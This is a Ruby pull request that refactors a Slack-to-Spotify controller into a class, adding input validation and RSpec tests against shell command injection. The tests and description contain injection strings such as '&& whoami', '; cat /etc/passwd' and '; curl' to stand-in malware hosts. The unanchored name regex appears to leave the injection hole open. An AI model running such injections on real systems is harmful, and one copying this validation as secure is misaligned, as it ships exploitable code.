### PR TITLE
OO Spotify Class

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -138,7 +138,7 @@ Style/TrailingCommaInArguments:
   - comma
   - consistent_comma
   - no_comma
-Style/TrailingCommaInLiteral:
+Style/TrailingCommaInArrayLiteral:
   Description: Checks for trailing comma in hash literals.
   StyleGuide: https://github.com/bbatsov/ruby-style-guide#no-trailing-array-commas
   Enabled: false

--- a/app.rb
+++ b/app.rb
@@ -33,13 +33,20 @@ HELP_TEXT = <<~HELP_TEXT.freeze
   `/maestro toggle repeat` -- Toggles repeat playback mode.
 HELP_TEXT
 
+VALID_COMMANDS = %w(play next prev replay pos pause stop quit vol status share toggle)
+
 def spotify(args)
-  return [HELP_TEXT, true] if args == "help"
-  puts "# > spotify #{args}"
-  output = `./spotify.sh #{args}`
+  args.downcase!
+  command, args = *split_args(args)
+  return [HELP_TEXT, true] if args == "help" || !VALID_COMMANDS.include?(command)
+  output = Spotify.public_send(command.to_sym, args)
   puts output
   output = HELP_TEXT unless $?.success?
   [output, $?.success?]
+end
+
+def split_args(args)
+  args.split(" ")
 end
 
 post "/maestro" do

--- a/app.rb
+++ b/app.rb
@@ -35,7 +35,7 @@ HELP_TEXT = <<~HELP_TEXT.freeze
 HELP_TEXT
 
 # Find methods unique to Spotify class
-VALID_COMMANDS = (Spotify.methods - Object.methods).freeze
+VALID_COMMANDS = (Spotify.public_methods - Object.public_methods).freeze
 
 def process_spotify_command(args)
   args.downcase!

--- a/app.rb
+++ b/app.rb
@@ -33,7 +33,7 @@ HELP_TEXT = <<~HELP_TEXT.freeze
   `/maestro toggle repeat` -- Toggles repeat playback mode.
 HELP_TEXT
 
-VALID_COMMANDS = %w(play next prev replay pos pause stop quit vol status share toggle)
+VALID_COMMANDS = %w(play next prev replay pos pause stop quit vol status share toggle).freeze
 
 def spotify(args)
   args.downcase!

--- a/spec/maestro_spec.rb
+++ b/spec/maestro_spec.rb
@@ -30,9 +30,7 @@ describe "Maestro" do
     end
   end
 
-  describe "/maestro help" do
-    let(:text) { "help" }
-
+  shared_examples_for "it displays the help text" do
     it "returns the usage text" do
       subject
       expect(last_response).to be_ok
@@ -42,6 +40,12 @@ describe "Maestro" do
       expect(json_response["text"]).to_not include("CLIENT_ID")
       expect(json_response["text"]).to_not include("CLIENT_SECRET")
     end
+  end
+
+  describe "/maestro help" do
+    let(:text) { "help" }
+
+    it_behaves_like "it displays the help text"
   end
 
   describe "Valid command" do
@@ -69,24 +73,12 @@ describe "Maestro" do
   describe "Invalid command" do
     let(:text) { "bogus" }
 
-    it "returns the usage text" do
-      subject
-      expect(last_response).to be_ok
-      expect(json_response["response_type"]).to eq("in_channel")
-      expect(json_response["text"]).to include("Usage:")
-      expect(json_response["text"]).to include("/maestro")
-      expect(json_response["text"]).to_not include("CLIENT_ID")
-      expect(json_response["text"]).to_not include("CLIENT_SECRET")
-    end
+    it_behaves_like "it displays the help text"
   end
 
   describe "Bash command execution" do
     let(:text) { "status; ls" }
-    it "returns the usage text" do
-      subject
-      expect(last_response).to be_ok
-      expect(json_response["text"]).to include("Usage:")
-      expect(json_response["text"]).to_not include("Gemfile")
-    end
+
+    it_behaves_like "it displays the help text"
   end
 end

--- a/spec/maestro_spec.rb
+++ b/spec/maestro_spec.rb
@@ -5,6 +5,7 @@ require "rack/test"
 require "json"
 require "pry-byebug"
 require_relative "../app"
+require_relative "../spotify"
 
 describe "Maestro" do
   include Rack::Test::Methods
@@ -40,12 +41,21 @@ describe "Maestro" do
     let(:text) { "bogus" }
 
     it "returns the usage text" do
-      expect(last_response).to_not be_ok
+      expect(last_response).to be_ok
       expect(json_response["response_type"]).to eq("in_channel")
       expect(json_response["text"]).to include("Usage:")
       expect(json_response["text"]).to include("/maestro")
       expect(json_response["text"]).to_not include("CLIENT_ID")
       expect(json_response["text"]).to_not include("CLIENT_SECRET")
+    end
+  end
+
+  describe "Command execution" do
+    let(:text) { "status; ls" }
+    it "returns the usage text" do
+      expect(last_response).to be_ok
+      expect(json_response["text"]).to include("Usage:")
+      expect(json_response["text"]).to_not include("Gemfile")
     end
   end
 end

--- a/spec/spotify_spec.rb
+++ b/spec/spotify_spec.rb
@@ -165,14 +165,20 @@ describe "Spotify" do
       it_behaves_like "a valid command"
     end
 
-    context "command injection" do
+    context "command injection with &&" do
       let(:play_args) { "artist Trivium && whoami" }
 
       it_behaves_like "an invalid command"
     end
 
-    context "command injection" do
+    context "command injection with ||" do
       let(:play_args) { "list some_playlist || curl malwarehost.com" }
+
+      it_behaves_like "an invalid command"
+    end
+
+    context "command injection with ;" do
+      let(:play_args) { "list some_playlist; curl malwarehost.com" }
 
       it_behaves_like "an invalid command"
     end

--- a/spec/spotify_spec.rb
+++ b/spec/spotify_spec.rb
@@ -1,0 +1,93 @@
+ENV["RACK_ENV"] = "test"
+
+require "rspec"
+require "pry-byebug"
+require_relative "../app"
+require_relative "../spotify"
+
+describe "Spotify" do
+  let(:command_stub) { `echo 'hello'` } # Prevent RSpec from executing real commands
+
+  describe ".stop" do
+    subject { Spotify.stop }
+
+    it "stops Spotify" do
+      expect(Spotify).to receive(:`).with("./spotify.sh stop").and_return(command_stub)
+      subject
+    end
+  end
+
+  describe ".next" do
+    subject { Spotify.next }
+
+    it "advances to the next song" do
+      expect(Spotify).to receive(:`).with("./spotify.sh next").and_return(command_stub)
+      subject
+    end
+  end
+
+  describe ".prev" do
+    subject { Spotify.prev }
+
+    it "replays the previous song" do
+      expect(Spotify).to receive(:`).with("./spotify.sh prev").and_return(command_stub)
+      subject
+    end
+  end
+
+  describe ".replay" do
+    subject { Spotify.replay }
+
+    it "replays the current song" do
+      expect(Spotify).to receive(:`).with("./spotify.sh replay").and_return(command_stub)
+      subject
+    end
+  end
+
+  describe ".pos" do
+    subject { Spotify.pos(pos_args) }
+
+    context "with an integer" do
+    end
+  end
+
+  describe ".vol" do
+    subject { Spotify.vol(vol_args) }
+
+    context "up" do
+      let(:vol_args) { "up" }
+
+      it "increases the volume" do
+        expect(Spotify).to receive(:`).with("./spotify.sh vol up").and_return(command_stub)
+        subject
+      end
+    end
+
+    context "down" do
+      let(:vol_args) { "down" }
+
+      it "decreases the volume" do
+        expect(Spotify).to receive(:`).with("./spotify.sh vol down").and_return(command_stub)
+        subject
+      end
+    end
+
+    context "with a volume integer" do
+    end
+  end
+
+  describe ".status" do
+    subject { Spotify.status }
+
+  end
+
+  describe ".share" do
+    subject { Spotify.share(share_args) }
+
+  end
+
+  describe ".play" do
+    subject { Spotify.play(play_args) }
+
+  end
+end

--- a/spec/spotify_spec.rb
+++ b/spec/spotify_spec.rb
@@ -12,7 +12,9 @@ describe "Spotify" do
     subject { Spotify.stop }
 
     it "stops Spotify" do
-      expect(Spotify).to receive(:`).with("./spotify.sh stop").and_return(command_stub)
+      expect(Spotify).to receive(:`)
+        .with("./spotify.sh stop")
+        .and_return(command_stub)
       subject
     end
   end
@@ -21,7 +23,9 @@ describe "Spotify" do
     subject { Spotify.next }
 
     it "advances to the next song" do
-      expect(Spotify).to receive(:`).with("./spotify.sh next").and_return(command_stub)
+      expect(Spotify).to receive(:`)
+        .with("./spotify.sh next")
+        .and_return(command_stub)
       subject
     end
   end
@@ -45,9 +49,26 @@ describe "Spotify" do
   end
 
   describe ".pos" do
-    subject { Spotify.pos(pos_args) }
+    subject { Spotify.pos(time_in_seconds) }
 
     context "with an integer" do
+      let(:time_in_seconds) { rand(0..100) }
+      it "changes the position of the song" do
+        expect(Spotify).to receive(:`).with("./spotify.sh pos #{time_in_seconds}")
+        subject
+      end
+    end
+
+    context "with invalid input" do
+      let(:time_in_seconds) { "30; cat /etc/passwd" }
+      it "does nothing" do
+        expect(Spotify).to_not receive(:`)
+        subject
+      end
+
+      it "returns nil" do
+        expect(subject).to be_nil
+      end
     end
   end
 
@@ -73,21 +94,133 @@ describe "Spotify" do
     end
 
     context "with a volume integer" do
+      let(:vol_args) { rand(0..100) }
+      it "changes the volume of the song" do
+        expect(Spotify).to receive(:`).with("./spotify.sh vol #{vol_args}")
+        subject
+      end
+    end
+
+    context "with invalid input" do
+      let(:vol_args) { "30; cat /etc/passwd" }
+      it "does nothing" do
+        expect(Spotify).to_not receive(:`)
+        subject
+      end
+
+      it "returns nil" do
+        expect(subject).to be_nil
+      end
     end
   end
 
   describe ".status" do
     subject { Spotify.status }
 
+    it "returns that status of the song" do
+      expect(Spotify).to receive(:`).with("./spotify.sh status").and_return(command_stub)
+      subject
+    end
   end
 
   describe ".share" do
     subject { Spotify.share(share_args) }
 
+    context "empty string" do
+      let(:share_args) { "" }
+
+      it "calls share with no args" do
+        expect(Spotify).to receive(:`).with("./spotify.sh share").and_return(command_stub)
+        subject
+      end
+    end
+
+    context "uri" do
+      let(:share_args) { "uri" }
+
+      it "advances to the next song" do
+        expect(Spotify).to receive(:`).with("./spotify.sh share uri").and_return(command_stub)
+        subject
+      end
+    end
+
+    context "url" do
+      let(:share_args) { "url" }
+
+      it "advances to the next song" do
+        expect(Spotify).to receive(:`).with("./spotify.sh share url").and_return(command_stub)
+        subject
+      end
+    end
   end
 
   describe ".play" do
     subject { Spotify.play(play_args) }
 
+    context "search by artist" do
+      let(:play_args) { "artist Trivium" }
+      it "searches by artist" do
+        expect(Spotify).to receive(:`)
+          .with("./spotify.sh play #{play_args}")
+          .and_return(command_stub)
+        subject
+      end
+    end
+
+    context "search by album" do
+      let(:play_args) { "album In Waves" }
+      it "searches by album" do
+        expect(Spotify).to receive(:`)
+          .with("./spotify.sh play #{play_args}")
+          .and_return(command_stub)
+        subject
+      end
+    end
+
+    context "search by playlist" do
+      let(:play_args) { "list this.is_my playlist" }
+      it "searches by playlist" do
+        expect(Spotify).to receive(:`)
+          .with("./spotify.sh play #{play_args}")
+          .and_return(command_stub)
+        subject
+      end
+    end
+
+    context "search by uri" do
+      let(:play_args) { "uri spotify:track:4hk0OBunwz04gknkfNLzUn" }
+      it "searches by uri" do
+        expect(Spotify).to receive(:`)
+          .with("./spotify.sh play #{play_args}")
+          .and_return(command_stub)
+        subject
+      end
+    end
+
+    context "command injection" do
+      let(:play_args) { "artist Trivium && whoami" }
+
+      it "does nothing" do
+        expect(Spotify).to_not receive(:`)
+        subject
+      end
+
+      it "returns nil" do
+        expect(subject).to be_nil
+      end
+    end
+
+    context "command injection" do
+      let(:play_args) { "list some_playlist || curl malwarehost.com" }
+
+      it "does nothing" do
+        expect(Spotify).to_not receive(:`)
+        subject
+      end
+
+      it "returns nil" do
+        expect(subject).to be_nil
+      end
+    end
   end
 end

--- a/spec/spotify_spec.rb
+++ b/spec/spotify_spec.rb
@@ -6,46 +6,53 @@ require_relative "../app"
 require_relative "../spotify"
 
 describe "Spotify" do
-  let(:command_stub) { `echo 'hello'` } # Prevent RSpec from executing real commands
+  shared_examples_for "a valid command" do
+    let(:command_stub) { `echo 'hello'` } # Prevent RSpec from executing real commands
+
+    it "executes the correct Shpotify command" do
+      expect(Spotify).to receive(:`).with(expected_command).and_return(command_stub)
+      subject
+    end
+  end
+
+  shared_examples_for "an invalid command" do
+    it "does not call a system command" do
+      expect(Spotify).to_not receive(:`)
+      subject
+    end
+
+    it "calls invalid_command" do
+      expect(Spotify).to receive(:invalid_command)
+      subject
+    end
+  end
 
   describe ".stop" do
     subject { Spotify.stop }
+    let(:expected_command) { "./spotify.sh stop" }
 
-    it "stops Spotify" do
-      expect(Spotify).to receive(:`)
-        .with("./spotify.sh stop")
-        .and_return(command_stub)
-      subject
-    end
+    it_behaves_like "a valid command"
   end
 
   describe ".next" do
     subject { Spotify.next }
+    let(:expected_command) { "./spotify.sh next" }
 
-    it "advances to the next song" do
-      expect(Spotify).to receive(:`)
-        .with("./spotify.sh next")
-        .and_return(command_stub)
-      subject
-    end
+    it_behaves_like "a valid command"
   end
 
   describe ".prev" do
     subject { Spotify.prev }
+    let(:expected_command) { "./spotify.sh prev" }
 
-    it "replays the previous song" do
-      expect(Spotify).to receive(:`).with("./spotify.sh prev").and_return(command_stub)
-      subject
-    end
+    it_behaves_like "a valid command"
   end
 
   describe ".replay" do
     subject { Spotify.replay }
+    let(:expected_command) { "./spotify.sh replay" }
 
-    it "replays the current song" do
-      expect(Spotify).to receive(:`).with("./spotify.sh replay").and_return(command_stub)
-      subject
-    end
+    it_behaves_like "a valid command"
   end
 
   describe ".pos" do
@@ -53,174 +60,121 @@ describe "Spotify" do
 
     context "with an integer" do
       let(:time_in_seconds) { rand(0..100) }
-      it "changes the position of the song" do
-        expect(Spotify).to receive(:`).with("./spotify.sh pos #{time_in_seconds}")
-        subject
-      end
+      let(:expected_command) { "./spotify.sh pos #{time_in_seconds}" }
+
+      it_behaves_like "a valid command"
     end
 
-    context "with invalid input" do
-      let(:time_in_seconds) { "30; cat /etc/passwd" }
-      it "does nothing" do
-        expect(Spotify).to_not receive(:`)
-        subject
-      end
+    context "with missing time" do
+      let(:time_in_seconds) { nil }
+      it_behaves_like "an invalid command"
+    end
 
-      it "returns nil" do
-        expect(subject).to be_nil
-      end
+    context "when not a number" do
+      let(:time_in_seconds) { "some string" }
+      it_behaves_like "an invalid command"
     end
   end
 
   describe ".vol" do
     subject { Spotify.vol(vol_args) }
+    let(:expected_command) { "./spotify.sh vol #{vol_args}".rstrip }
 
     context "up" do
       let(:vol_args) { "up" }
 
-      it "increases the volume" do
-        expect(Spotify).to receive(:`).with("./spotify.sh vol up").and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "down" do
       let(:vol_args) { "down" }
 
-      it "decreases the volume" do
-        expect(Spotify).to receive(:`).with("./spotify.sh vol down").and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "with a volume integer" do
       let(:vol_args) { rand(0..100) }
-      it "changes the volume of the song" do
-        expect(Spotify).to receive(:`).with("./spotify.sh vol #{vol_args}")
-        subject
-      end
+
+      it_behaves_like "a valid command"
+    end
+
+    context "with missing vol" do
+      let(:vol_args) { nil }
+      it_behaves_like "an invalid command"
     end
 
     context "with invalid input" do
       let(:vol_args) { "30; cat /etc/passwd" }
-      it "does nothing" do
-        expect(Spotify).to_not receive(:`)
-        subject
-      end
-
-      it "returns nil" do
-        expect(subject).to be_nil
-      end
+      it_behaves_like "an invalid command"
     end
   end
 
   describe ".status" do
     subject { Spotify.status }
+    let(:expected_command) { "./spotify.sh status" }
 
-    it "returns that status of the song" do
-      expect(Spotify).to receive(:`).with("./spotify.sh status").and_return(command_stub)
-      subject
-    end
+    it_behaves_like "a valid command"
   end
 
   describe ".share" do
     subject { Spotify.share(share_args) }
+    let(:expected_command) { "./spotify.sh share #{share_args}".rstrip }
 
     context "empty string" do
       let(:share_args) { "" }
 
-      it "calls share with no args" do
-        expect(Spotify).to receive(:`).with("./spotify.sh share").and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "uri" do
       let(:share_args) { "uri" }
+      let(:expected_command) { "./spotify.sh share uri" }
 
-      it "advances to the next song" do
-        expect(Spotify).to receive(:`).with("./spotify.sh share uri").and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "url" do
       let(:share_args) { "url" }
+      let(:expected_command) { "./spotify.sh share url" }
 
-      it "advances to the next song" do
-        expect(Spotify).to receive(:`).with("./spotify.sh share url").and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
   end
 
   describe ".play" do
     subject { Spotify.play(play_args) }
+    let(:expected_command) { "./spotify.sh play #{play_args}" }
 
     context "search by artist" do
       let(:play_args) { "artist Trivium" }
-      it "searches by artist" do
-        expect(Spotify).to receive(:`)
-          .with("./spotify.sh play #{play_args}")
-          .and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "search by album" do
       let(:play_args) { "album In Waves" }
-      it "searches by album" do
-        expect(Spotify).to receive(:`)
-          .with("./spotify.sh play #{play_args}")
-          .and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "search by playlist" do
       let(:play_args) { "list this.is_my playlist" }
-      it "searches by playlist" do
-        expect(Spotify).to receive(:`)
-          .with("./spotify.sh play #{play_args}")
-          .and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "search by uri" do
       let(:play_args) { "uri spotify:track:4hk0OBunwz04gknkfNLzUn" }
-      it "searches by uri" do
-        expect(Spotify).to receive(:`)
-          .with("./spotify.sh play #{play_args}")
-          .and_return(command_stub)
-        subject
-      end
+      it_behaves_like "a valid command"
     end
 
     context "command injection" do
       let(:play_args) { "artist Trivium && whoami" }
 
-      it "does nothing" do
-        expect(Spotify).to_not receive(:`)
-        subject
-      end
-
-      it "returns nil" do
-        expect(subject).to be_nil
-      end
+      it_behaves_like "an invalid command"
     end
 
     context "command injection" do
       let(:play_args) { "list some_playlist || curl malwarehost.com" }
 
-      it "does nothing" do
-        expect(Spotify).to_not receive(:`)
-        subject
-      end
-
-      it "returns nil" do
-        expect(subject).to be_nil
-      end
+      it_behaves_like "an invalid command"
     end
   end
 end

--- a/spotify.rb
+++ b/spotify.rb
@@ -14,7 +14,7 @@ class Spotify
 
   class << self
     def play(play_args)
-      return unless valid_play?(play_args)
+      return invalid_command unless valid_play?(play_args)
       send_command("play #{play_args}")
     end
 
@@ -35,12 +35,12 @@ class Spotify
     end
 
     def pos(time)
-      return unless time == time.to_i
+      return invalid_command unless time == time.to_i
       send_command("pos #{time.to_i}")
     end
 
     def vol(change = nil)
-      return unless valid_volume_change?(change)
+      return invalid_command unless valid_volume_change?(change)
       send_command("vol #{change}")
     end
 
@@ -49,7 +49,7 @@ class Spotify
     end
 
     def share(share_item)
-      return unless valid_share?(share_item)
+      return invalid_command unless valid_share?(share_item)
       send_command("share #{share_item}".rstrip) # Prevent extra whitespace
     end
 
@@ -59,6 +59,10 @@ class Spotify
       output = `./spotify.sh #{command}`
       output = HELP_TEXT unless $?.success?
       [output, $?.success?]
+    end
+
+    def invalid_command
+      [HELP_TEXT, false]
     end
 
     def valid_volume_change?(vol_arg)

--- a/spotify.rb
+++ b/spotify.rb
@@ -1,0 +1,99 @@
+class Spotify
+  VALID_TOGGLES = %w(shuffle repeat).freeze
+  VALID_SHARES = %w(url uri).freeze
+  NAME_REGEX = /[a-z0-9\s]*/
+  URI_REGEX = /\Aspotify:(track|album|artist|user):([a-z0-9]+(:playlist:))*(spotify:playlist:)?[a-z0-9]{22}\z/i
+
+  class << self
+    def play(play_args)
+      return unless valid_play?(play_args)
+      send_command("play #{play_args}")
+    end
+
+    def stop
+      send_command("stop")
+    end
+
+    def next
+      send_command("next")
+    end
+
+    def prev
+      send_command("prev")
+    end
+
+    def replay
+      send_command("replay")
+    end
+
+    def pos(time)
+      return unless time == time.to_i
+      send_command("pos #{time.to_i}")
+    end
+
+    def vol(change = nil)
+      return unless valid_volume_change?(change)
+      send_command("vol #{change}")
+    end
+
+    def status
+      send_command("status")
+    end
+
+    def share(share_item)
+      return unless valid_share?(share_item)
+      send_command("share #{share_item}")
+    end
+
+    private
+
+    def send_command(command)
+      output = `./spotify.sh #{command}`
+      output = HELP_TEXT unless $?.success?
+      [output, $?.success?]
+    end
+
+    def valid_volume_change?(vol_arg)
+      if vol_arg == vol_arg.to_i
+        vol_arg.between?(0, 100)
+      else
+        ["up", "down"].include?(vol_arg)
+      end
+    end
+
+    def valid_toggle?(toggle_item)
+      VALID_TOGGLES.include?(toggle_item)
+    end
+
+    def valid_share?(share_item)
+      VALID_SHARES.include?(share_item) || share_item.empty?
+    end
+
+    def valid_play?(play_args)
+      play_args.empty? || validate_uri(play_args) || validate_name(play_args)
+    end
+
+    def validate_uri(uri)
+      URI_REGEX.match(uri)
+    end
+
+    def validate_name(name)
+      NAME_REGEX.match(name)
+    end
+
+    def play_command(play_args)
+      play_args.split(" ").first
+    end
+
+    def name_provided?(play_args)
+      !uri_provided(play_args)
+    end
+
+    def uri_provided?(play_args)
+      play_command(play_args) == "uri"
+    end
+
+  rescue NoMethodError
+    "Spotify cannot respond to the command requested"
+  end
+end


### PR DESCRIPTION
### Why?
Maestro allowed any arbitrary shell commands to be run using `/maestro` along with a `;` or `&&`
e.g. `/maestro status; curl dangerous-malware.com > .malware-file`
This change also makes the code more maintainable and preps it for additional features

### What Changed?
Added a Spotify class with methods for each of Spotify's commands
Added validation to commands to mitigate bash command injection attacks
Added lots of tests